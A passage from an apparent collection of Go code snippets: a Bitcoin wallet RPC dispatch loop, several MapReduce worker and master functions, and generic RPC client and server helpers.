\n\t\t\t\t\tmsg.Ch.(chan EstimateFeeRes) <-EstimateFeeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"generate\"].Call:\n\t\t\t\tif res, e = nrh[\"generate\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GenerateRes) <-GenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getaddednodeinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getaddednodeinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetAddedNodeInfoCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetAddedNodeInfoResultAddr); ok { \n\t\t\t\t\tmsg.Ch.(chan GetAddedNodeInfoRes) <-GetAddedNodeInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getbestblock\"].Call:\n\t\t\t\tif res, e = nrh[\"getbestblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBestBlockResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBestBlockRes) <-GetBestBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getbestblockhash\"].Call:\n\t\t\t\tif res, e = nrh[\"getbestblockhash\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBestBlockHashRes) <-GetBestBlockHashRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblock\"].Call:\n\t\t\t\tif res, e = nrh[\"getblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockVerboseResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockRes) <-GetBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockchaininfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockchaininfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockChainInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockChainInfoRes) <-GetBlockChainInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockcount\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockcount\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(int64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockCountRes) <-GetBlockCountRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockhash\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockhash\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockHashCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockHashRes) <-GetBlockHashRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblockheader\"].Call:\n\t\t\t\tif res, e = nrh[\"getblockheader\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockHeaderCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetBlockHeaderVerboseResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockHeaderRes) <-GetBlockHeaderRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getblocktemplate\"].Call:\n\t\t\t\tif res, e = nrh[\"getblocktemplate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetBlockTemplateCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetBlockTemplateRes) <-GetBlockTemplateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcfilter\"].Call:\n\t\t\t\tif res, e = nrh[\"getcfilter\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetCFilterCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCFilterRes) <-GetCFilterRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcfilterheader\"].Call:\n\t\t\t\tif res, e = nrh[\"getcfilterheader\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetCFilterHeaderCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCFilterHeaderRes) <-GetCFilterHeaderRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getconnectioncount\"].Call:\n\t\t\t\tif res, e = nrh[\"getconnectioncount\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(int32); ok { \n\t\t\t\t\tmsg.Ch.(chan GetConnectionCountRes) <-GetConnectionCountRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getcurrentnet\"].Call:\n\t\t\t\tif res, e = nrh[\"getcurrentnet\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetCurrentNetRes) <-GetCurrentNetRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getdifficulty\"].Call:\n\t\t\t\tif res, e = nrh[\"getdifficulty\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetDifficultyCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetDifficultyRes) <-GetDifficultyRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getgenerate\"].Call:\n\t\t\t\tif res, e = nrh[\"getgenerate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetHeadersCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan GetGenerateRes) <-GetGenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"gethashespersec\"].Call:\n\t\t\t\tif res, e = nrh[\"gethashespersec\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetHashesPerSecRes) <-GetHashesPerSecRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getheaders\"].Call:\n\t\t\t\tif res, e = nrh[\"getheaders\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetHeadersCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetHeadersRes) <-GetHeadersRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.InfoChainResult0); ok { \n\t\t\t\t\tmsg.Ch.(chan GetInfoRes) <-GetInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getmempoolinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getmempoolinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMempoolInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetMempoolInfoRes) <-GetMempoolInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getmininginfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getmininginfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMiningInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetMiningInfoRes) <-GetMiningInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getnettotals\"].Call:\n\t\t\t\tif res, e = nrh[\"getnettotals\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetNetTotalsResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetNetTotalsRes) <-GetNetTotalsRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getnetworkhashps\"].Call:\n\t\t\t\tif res, e = nrh[\"getnetworkhashps\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetNetworkHashPSCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetPeerInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetNetworkHashPSRes) <-GetNetworkHashPSRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getpeerinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getpeerinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetPeerInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetPeerInfoRes) <-GetPeerInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getrawmempool\"].Call:\n\t\t\t\tif res, e = nrh[\"getrawmempool\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetRawMempoolCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetRawMempoolRes) <-GetRawMempoolRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"getrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetRawTransactionRes) <-GetRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"gettxout\"].Call:\n\t\t\t\tif res, e = nrh[\"gettxout\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetTxOutCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetTxOutRes) <-GetTxOutRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"help\"].Call:\n\t\t\t\tif res, e = nrh[\"help\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.HelpCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan HelpRes) <-HelpRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"node\"].Call:\n\t\t\t\tif res, e = nrh[\"node\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.NodeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan NodeRes) <-NodeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"ping\"].Call:\n\t\t\t\tif res, e = nrh[\"ping\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan PingRes) <-PingRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"resetchain\"].Call:\n\t\t\t\tif res, e = nrh[\"resetchain\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan ResetChainRes) <-ResetChainRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"restart\"].Call:\n\t\t\t\tif res, e = nrh[\"restart\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan RestartRes) <-RestartRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"searchrawtransactions\"].Call:\n\t\t\t\tif res, e = nrh[\"searchrawtransactions\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SearchRawTransactionsCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.SearchRawTransactionsResult); ok { \n\t\t\t\t\tmsg.Ch.(chan SearchRawTransactionsRes) <-SearchRawTransactionsRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"sendrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"sendrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SendRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan SendRawTransactionRes) <-SendRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"setgenerate\"].Call:\n\t\t\t\tif res, e = nrh[\"setgenerate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SetGenerateCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan SetGenerateRes) <-SetGenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"stop\"].Call:\n\t\t\t\tif res, e = nrh[\"stop\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan StopRes) <-StopRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"submitblock\"].Call:\n\t\t\t\tif res, e = nrh[\"submitblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SubmitBlockCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan SubmitBlockRes) <-SubmitBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"uptime\"].Call:\n\t\t\t\tif res, e = nrh[\"uptime\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMempoolInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan UptimeRes) <-UptimeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"validateaddress\"].Call:\n\t\t\t\tif res, e = nrh[\"validateaddress\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.ValidateAddressCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.ValidateAddressChainResult); ok { \n\t\t\t\t\tmsg.Ch.(chan ValidateAddressRes) <-ValidateAddressRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"verifychain\"].Call:\n\t\t\t\tif res, e = nrh[\"verifychain\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VerifyChainCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan VerifyChainRes) <-VerifyChainRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"verifymessage\"].Call:\n\t\t\t\tif res, e = nrh[\"verifymessage\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VerifyMessageCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan VerifyMessageRes) <-VerifyMessageRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"version\"].Call:\n\t\t\t\tif res, e = nrh[\"version\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VersionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(map[string]btcjson.VersionResult); ok { \n\t\t\t\t\tmsg.Ch.(chan VersionRes) <-VersionRes{&r, e} } \n\t\t\tcase <-quit.Wait():\n\t\t\t\tD.Ln(\"stopping wallet cAPI\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func Worker(mapf func(string, string) []Pair, reducef func(string, []string) string) {\n\tclient := MakeRpcClient()\n\tdefer client.Close()\n\tfor {\n\t\t// 对端的 server 如果退出了,下面这个会有什么反应\n\t\ttask := Task{TaskKind: ReduceTaskFlag, TaskId: \"10\"}\n\n\t\t// fmt.Println(\"request task\")\n\t\tstatus := client.Call(\"Coordinator.RequestTask\", struct{}{}, &task)\n\t\t// fmt.Println(\"Get response\", task)\n\t\tif status == false {\n\t\t\tbreak\n\t\t}\n\n\t\tswitch task.TaskKind {\n\t\tcase MapTaskFlag:\n\t\t\t// fmt.Println(\"get map task \", task.TaskId)\n\t\t\tintermediate := mapf(task.File, readFileToString(task.File))\n\t\t\t// fmt.Println(\"map task done\")\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\tr := MapResult{TaskId: task.TaskId, Items: divideIntoItems(intermediate)}\n\t\t\tclient.Call(\"Coordinator.UploadMapResult\", r, nil)\n\t\t\t// fmt.Println(\"map result upload\")\n\n\t\tcase ReduceTaskFlag:\n\t\t\tLog(\"get reduce task \", task.TaskId)\n\t\t\tfilename := fmt.Sprint(\"mr-out-\", task.TaskId)\n\t\t\tf, _ := os.Create(filename)\n\t\t\tdefer f.Close()\n\t\t\targFile, _ := os.Open(task.File)\n\t\t\treader := bufio.NewReader(argFile)\n\n\t\t\tfor {\n\t\t\t\tend, k, vs := readFrom(reader)\n\t\t\t\tif end {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tLog(\"reduce func call\", k)\n\t\t\t\t// fmt.Println(\"key: \", k, \"values: \", vs)\n\n\t\t\t\tv := reducef(k, vs)\n\t\t\t\tfmt.Fprintf(f, \"%v %v\\n\", k, v)\n\t\t\t}\n\t\t\tLog(\"reduce task \", task.TaskId, \"done\")\n\n\t\t\tresult := ReduceResult{TaskId: task.TaskId, Filename: filename}\n\t\t\tclient.Call(\"Coordinator.UploadReduceResult\", result, nil)\n\t\t\tLog(\"reduce task\", task.TaskId, \"result upload\")\n\n\t\tcase ShutdownFlag:\n\t\t\tfallthrough\n\t\tdefault:\n\t\t\treturn\n\t\t}\n\t}\n}", "func call(rpcname string, args interface{}, reply interface{}) {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tsockname := masterSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err != nil {\n\t\tlog.Fatal(\"rpc.Client.Call:\", err)\n\t}\n}", "func main() {\n\n\t// The command line arguments. args[1] is the supervisor address,\n\t// args[2] is the port to run on\n\targs := os.Args\n\n\t// If the right number of arguments weren't passed, ask for them.\n\tif len(args) != 3 {\n\t\tfmt.Println(\"Please pass the hostname of the supervisor and the outgoing port.\" +\n\t\t\t\"eg. http://stu.cs.jmu.edu:4001 4031\")\n\t\tos.Exit(1)\n\t}\n\n\tresp, err := http.Post(args[1]+\"/register\", \"text/plain\", strings.NewReader(args[2]))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbuf := new(bytes.Buffer)\n\tbuf.ReadFrom(resp.Body)\n\n\t// This gives what the supervisor thinks the worker is, which is useful for debugging.\n\t_ = data.JsonToWorker(buf.Bytes())\n\n\t// Make a directory for this worker, to avoid IO errors from workers writing and reading to\n\t// the same file.\n\tworkerDirectory = args[2]\n\tif _, err = os.Stat(workerDirectory); os.IsNotExist(err) {\n\t\terr = os.Mkdir(args[2], 0777)\n\t\tcheck(err)\n\t}\n\n\t// If there is a request for /newjob,\n\t// the new_job routine will handle it.\n\thttp.HandleFunc(\"/newjob\", new_job)\n\n\t// Listen on a port.\n\tlog.Fatal(http.ListenAndServe(\":\"+args[2], nil))\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor {\n\t\targs := RPCArgs{}\n\t\treply := RPCReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\t\tswitch reply.TaskInfo.TaskType {\n\t\tcase Map:\n\t\t\tdoMap(&reply.TaskInfo, mapf)\n\t\tcase Reduce:\n\t\t\tdoReduce(&reply.TaskInfo, reducef)\n\t\tcase Wait:\n\t\t\tfmt.Println(\"Waiting task\")\n\t\t\ttime.Sleep(time.Second)\n\t\t\tcontinue\n\t\tcase Done:\n\t\t\tfmt.Println(\"All task done\")\n\t\t\treturn\n\t\t}\n\t\targs.TaskInfo = reply.TaskInfo\n\t\tcall(\"Master.TaskDone\", &args, &reply)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t\tports = Ports{ usedPorts: make(map[int]bool) }\n\t\t\n\n\t\tjob := new(Job)\n\t\tjob.MapFunc = mapf\n\t\tjob.RedFunc = reducef\n\t\tjob.JobType = Mapper\n\n\n\t\tspawnChannel := make(chan int)\n\t\tsomechan := make(chan bool)\n\t\tgo StartRPCClient(spawnChannel, somechan, job)\n\n\t\ttime.Sleep(10*time.Millisecond)\n\t\tgo SpawnReducers(somechan, job)\n\t\tSpawnMappers(spawnChannel, job)\n}", "func (b *Backend) RPC(choice uint64, body []byte, v interface{}) error {\n\tconn, err := b.Dial()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdefer conn.Close()\n\n\tchoiceBuf := make([]byte, binary.MaxVarintLen64)\n\tbinary.PutUvarint(choiceBuf, choice)\n\t_, err = conn.conn.Write(choiceBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbodyLenBuf := make([]byte, binary.MaxVarintLen64)\n\tbinary.PutUvarint(bodyLenBuf, uint64(len(body)))\n\n\t_, err = conn.conn.Write(bodyLenBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = conn.conn.Write(body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\trespLenBuf := make([]byte, binary.MaxVarintLen64)\n\t_, err = conn.conn.Read(respLenBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\trespLen, _ := binary.Uvarint(respLenBuf)\n\trespBuf := make([]byte, respLen)\n\t_, err = conn.conn.Read(respBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = json.Unmarshal(respBuf, v)\n\n\treturn err\n}", "func (m *Master) WorkerHandler(args *Args, reply *Reply) error {\n\twg := sync.WaitGroup{}\n\twg.Add(1)\n\tgo func() {\n\t\tif args.ReqType == AskForTask {\n\t\t\tm.assignTask(reply)\n\t\t} else {\n\t\t\tm.finishTask(args)\n\t\t}\n\t\twg.Done()\n\t}()\n\twg.Wait()\n\treturn nil\n}", "func (w *worker) Invoke(args interface{}) error { return ErrNotImplement }", "func Worker(mapf func(string, string) []KeyValue,\n\t\t\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// TODO: maybe use a channel for in-process comm?\n\t// determine task state to know which master RPC to call\n\t//reply := CallRegisterIdle()\n\tvar reply *RegisterIdleReply\n\n\t//for workerInfo.State == IDLE || workerInfo.State == COMPLETED {\n\tfor {\n\n\t\tif workerInfo.State == IDLE {\n\t\t\treply = CallRegisterIdle()\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got Error!!!!!!\")\n\t\t\t}\n\t\t} else if workerInfo.State == COMPLETED {\n\t\t\treply = CallCompletedTask() // override reply\n\t\t\t//if reply != nil {\n\t\t\t//\tresetWorkerInfo()\n\t\t\t//\tworkerInfo.State = IDLE\n\t\t\t//}\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got errror!!!!!!!!\")\n\t\t\t}\n\t\t} else {\n\t\t\tworker_logger.Error(\"Shouldn't be in IN_PROGRESS state here...\")\n\t\t}\n\n\t\t// TODO: maybe don't need a mutex?\n\t\tif reply.MasterCommand == ASSIGN_TASK {\n\n\t\t\tworkerInfo.State = IN_PROGRESS\n\t\t\tworkerInfo.Id = reply.WorkerId\n\t\t\tworkerInfo.TaskType = reply.TaskType\n\t\t\tworkerInfo.TaskId = reply.TaskId\n\t\t\tworkerInfo.InputFileLoc = reply.InputFileLoc\n\t\t\tworkerInfo.NReduce = reply.NReduce\n\t\t\t//workerInfo.Progress = 0.0\n\n\t\t\t// TODO: replace this with broadcaster/observer design\n\t\t\tprogress_ch := make(chan float32)\n\t\t\tdone := make(chan struct{})\n\t\t\theartbeatStoped := make(chan struct {})\n\n\n\t\t\t// Actual computing job goroutine\n\t\t\tgo func() {\n\t\t\t\tif workerInfo.TaskType == MAP {\n\t\t\t\t\tdoMapTask(&workerInfo, mapf, progress_ch)\n\t\t\t\t} else if workerInfo.TaskType == REDUCE {\n\t\t\t\t\tdoReduceTask(&workerInfo, reducef, progress_ch)\n\t\t\t\t}/* else { // None task\n\t\t\t\t\tclose(progress_ch)\n\t\t\t\t}*/\n\n\t\t\t}()\n\n\t\t\t// Heartbeat gorountine\n\t\t\tgo func() {\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\t\tcase <-done:\n\t\t\t\t\t\t\tworker_logger.Debug(\"heartbeat job received done signal, stopping!\")\n\t\t\t\t\t\t\theartbeatStoped <- struct{}{}\n\t\t\t\t\t\t\tclose(heartbeatStoped)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tCallSendHeartbeat()\n\t\t\t\t\t\t\ttime.Sleep(1*time.Second)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}()\n\n\n\t\t\tfor progress := range progress_ch {\n\t\t\t\tworker_logger.Debug(fmt.Sprintf(\"Task(%s) progress: %f\", workerInfo.TaskId, progress))\n\t\t\t}\n\t\t\tdone <- struct{}{}\n\t\t\tclose(done)\n\t\t\t<- heartbeatStoped\n\n\t\t\t// Set result location & worker state\n\t\t\tworkerInfo.State = COMPLETED\n\n\t\t} else if reply.MasterCommand == STAND_BY {\n\t\t\tworker_logger.Debug(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\ttime.Sleep(500*time.Millisecond)\n\t\t} else if reply.MasterCommand == PLEASE_EXIT {\n\t\t\tworker_logger.Info(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\treturn\n\t\t}\n\n\t}\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func (wk *Worker) startRPCServer() {\n\t// TODO: implement me\n\t// Hint: Refer to how the driver's startRPCServer is implemented.\n\t// TODO TODO TODO\n\t//\n\n\t//\n\t// Once shutdown is closed, should the following statement be\n\t// called, meaning the worker RPC server is existing.\n\tserverless.Debug(\"Worker: %v RPC server exist\\n\", wk.address)\n}", "func (r *rpcServerService) doCall(serviceMethod string, args []byte) ([]byte,\n error) {\n\n glog.V(3).Infof(\"rpc: doCall to %s\", serviceMethod)\n glog.V(4).Infof(\"rpc: doCall to %s with %v\", serviceMethod, args)\n\n dot := strings.LastIndex(serviceMethod, \".\")\n if dot < 0 {\n err := fmt.Errorf(\"rpc: service/method ill-formed: \" + serviceMethod)\n glog.Error(err)\n return nil, err\n }\n serviceName := serviceMethod[:dot]\n methodName := serviceMethod[dot+1:]\n // Look up the request.\n serviceInf, ok := r.serviceMap.Get(serviceName)\n if !ok || serviceInf == nil {\n err := errors.New(\"rpc: can't find service \" + serviceName)\n glog.Error(err)\n return nil, err\n }\n service, okType := serviceInf.(*rpcServiceMap)\n if !okType || service == nil {\n err := errors.New(\"rpc: unexpected type error for service \" + serviceName)\n glog.Error(err)\n return nil, err\n }\n mtype := service.method[methodName]\n if mtype == nil {\n err := errors.New(\"rpc: can't find method \" + serviceMethod)\n glog.Error(err)\n return nil, err\n }\n argv := reflect.New(mtype.argType)\n errJSON := json.Unmarshal(args, argv.Interface())\n if errJSON != nil {\n glog.Error(\"error in unmarshal: \", errJSON)\n return nil, errJSON\n }\n glog.V(4).Infof(\"rpc: json unmarshalled request is: %s -> %#v\", args, argv)\n replyv := reflect.New(mtype.replyType.Elem())\n\n glog.V(3).Infof(\"rpc: calling service %v method %v with %v\",\n service, mtype, argv)\n\n errCall := service.callService(mtype, argv.Elem(), replyv)\n if errCall != nil {\n glog.V(3).Infof(\"rpc call returned error: \", errCall)\n return nil, errCall\n }\n reply, errRep := json.Marshal(replyv.Interface())\n if errRep != nil {\n glog.Error(\"rpc reply marshall error: \", errRep)\n return nil, errRep\n }\n glog.V(3).Info(\"rpc reply: \", string(reply))\n return reply, nil\n}", "func main() {\n\t// =====increment.pb.goのやつ======== ​\n\t//listen, err := net.Listen(\"tcp\", \"localhost:5555\")\n\t//if err != nil {\n\t//\tlog.Fatalln(err)\n\t//}\n\t//\n\t//server := grpc.NewServer()\n\t//service := &incrementService{}\n\t//\n\t//pb.RegisterIncrementServiceServer(server, 